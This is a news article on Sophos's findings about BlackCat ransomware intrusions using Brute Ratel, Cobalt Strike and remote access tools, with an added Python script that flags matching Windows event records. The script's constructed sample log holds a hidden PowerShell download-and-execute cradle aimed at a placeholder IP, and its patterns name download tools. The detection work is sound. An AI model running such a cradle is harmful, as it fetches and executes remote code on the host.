BlackCat Ransomware Group Deploys Brute Ratel Pen Testing Kit

According to security company Sophos, the BlackCat ransomware group has deployed a new binary to aid its intrusions. Sophos found the group using Brute Ratel, a post-exploitation framework that gives attackers remote access to compromised hosts.

Several Sophos customers contacted the company about BlackCat ransomware infections. Analysis of those incidents showed that the group exploits unpatched VPN appliances and firewalls to gain access to internal networks.

The attackers used vulnerabilities reported in 2018 to read memory from the VPN appliances, which allowed them to log in as legitimate users. From there they dumped credentials from the domain controller and created administrative accounts. They then ran a scanning tool (netscanportable.exe) to find additional targets and moved laterally over RDP. Both Windows servers and ESXi hypervisors were targeted.


The attackers used PowerShell on compromised hosts to download Brute Ratel and Cobalt Strike beacons, and then installed a Windows service named wewe.

Brute Ratel was not the only tool in play. The attackers also used the commercial remote access tools TeamViewer and AnyDesk, as well as ngrok, an open-source alternative.
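The tooling described above (PowerShell download cradles, a service named wewe, the netscanportable.exe scanner, and the TeamViewer, AnyDesk and ngrok remote access tools) all leaves traces in Windows event logs. The following script is an added example, not code from Sophos or from the article: it parses constructed Windows event records (event ID 7045, a service was installed; event ID 4688, a process was created) and flags the behaviours the article attributes to BlackCat. The log lines, the `k=v` record format, the IP address and the executable names for the remote access tools are assumptions made for the example; only the service name and scanner name come from the article.

```python
"""Added example (not Sophos's or the article's code): triage constructed
Windows event records for the BlackCat behaviours described in the article.
Event IDs 7045 (service installed) and 4688 (process creation) are real
Windows event IDs; the records and k=v layout below are constructed."""
import re
from dataclasses import dataclass

# Service name taken from the article. Extend locally as needed.
SUSPICIOUS_SERVICE_NAMES = {"wewe"}

# Remote access tools named in the article; the executable names are
# assumptions based on the vendors' usual binaries.
REMOTE_ACCESS_TOOLS = {"teamviewer.exe", "anydesk.exe", "ngrok.exe"}

# Scanner named in the article.
SCANNERS = {"netscanportable.exe"}

# Common PowerShell download-cradle markers.
POWERSHELL_DOWNLOAD = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|"
    r"\bwget\b|net\.webclient|bitstransfer)", re.IGNORECASE)


@dataclass
class Event:
    event_id: int
    host: str
    fields: dict


def parse_event(line):
    """Parse 'id=7045 host=DC01 k=v k="v with spaces"' into an Event."""
    tokens = re.findall(r'(\w+)=("[^"]*"|\S+)', line)
    fields = {k: v.strip('"') for k, v in tokens}
    return Event(int(fields.pop("id")), fields.pop("host"), fields)


def triage(event):
    """Return a list of (severity, reason) findings for one event."""
    findings = []
    if event.event_id == 7045:
        name = event.fields.get("service", "").lower()
        path = event.fields.get("image", "").lower()
        if name in SUSPICIOUS_SERVICE_NAMES:
            findings.append(("high", f"service name '{name}' on watch-list"))
        if "powershell" in path:
            findings.append(("high", "service binary launches PowerShell"))
    elif event.event_id == 4688:
        image = event.fields.get("image", "").lower().rsplit("\\", 1)[-1]
        cmd = event.fields.get("cmd", "")
        if image == "powershell.exe" and POWERSHELL_DOWNLOAD.search(cmd):
            findings.append(("high", "PowerShell download cradle"))
        if image in REMOTE_ACCESS_TOOLS:
            findings.append(("medium", f"remote access tool {image}"))
        if image in SCANNERS:
            findings.append(("medium", f"network scanner {image}"))
    return findings


# Constructed sample records (not real captures); 198.51.100.7 is a
# documentation address used as a placeholder.
SAMPLE_LOG = """
id=4688 host=WS07 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmd="powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b')"
id=7045 host=WS07 service=wewe image="C:\\ProgramData\\wewe.exe"
id=4688 host=WS07 image="C:\\Users\\Public\\netscanportable.exe" cmd="netscanportable.exe /range:10.0.0.0/16"
id=4688 host=WS07 image="C:\\Program Files\\AnyDesk\\AnyDesk.exe" cmd="AnyDesk.exe --silent"
id=4688 host=WS07 image="C:\\Windows\\System32\\notepad.exe" cmd="notepad.exe readme.txt"
id=7045 host=WS08 service=Spooler image="C:\\Windows\\System32\\spoolsv.exe"
"""


def scan(log_text):
    """Triage every record; return [(host, event_id, findings)] for hits only."""
    results = []
    for line in log_text.strip().splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        hits = triage(ev)
        if hits:
            results.append((ev.host, ev.event_id, hits))
    return results


if __name__ == "__main__":
    for host, eid, hits in scan(SAMPLE_LOG):
        for severity, reason in hits:
            print(f"{host} event {eid}: [{severity}] {reason}")
```

Run stand-alone, the script reports four hits on WS07 (the download cradle, the wewe service, the scanner and AnyDesk) and ignores the benign notepad and Spooler records. The point of the watch-lists is that none of these tools is malicious on its own; it is the sequence on one host, PowerShell download followed by a new service and then scanning and remote access tooling, that matches the intrusion chain Sophos describes, so in practice the findings should be correlated per host rather than alerted on individually.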

Each attack used a ransomware binary customized for the victim, which encrypted files and dropped a ransom note containing a link to a Tor site. The binary would not run unless it was supplied with a 64-bit access token, a measure that stops sandboxes and analysts who lack the token from executing the sample.

BlackCat also searched victims' networks for sensitive data, at times using PowerShell to locate machines. The files were compressed with WinRAR and uploaded to attacker-controlled servers; in some cases, Sophos says, the attackers used the Chrome browser on the victim machine to perform the upload.

Brute Ratel's creators describe it as a customized command-and-control center for adversary simulation and red teaming. As with Cobalt Strike, however, the same capabilities serve attackers just as well against real victims' networks.

Palo Alto Networks' Unit 42 research team reported malicious actors using Brute Ratel earlier this month. The tool is considered particularly dangerous because it is built to evade antivirus and endpoint detection and response products. Unit 42 found Brute Ratel in a sample uploaded to the malware scanning service VirusTotal; at the time, none of the 56 antimalware engines there flagged it. According to the Unit 42 report, the tool's users displayed behavior consistent with Russia's APT29 hacking group.

Resecurity researchers said earlier this week that they had identified a significant increase in ransom demands from the BlackCat ransomware group.
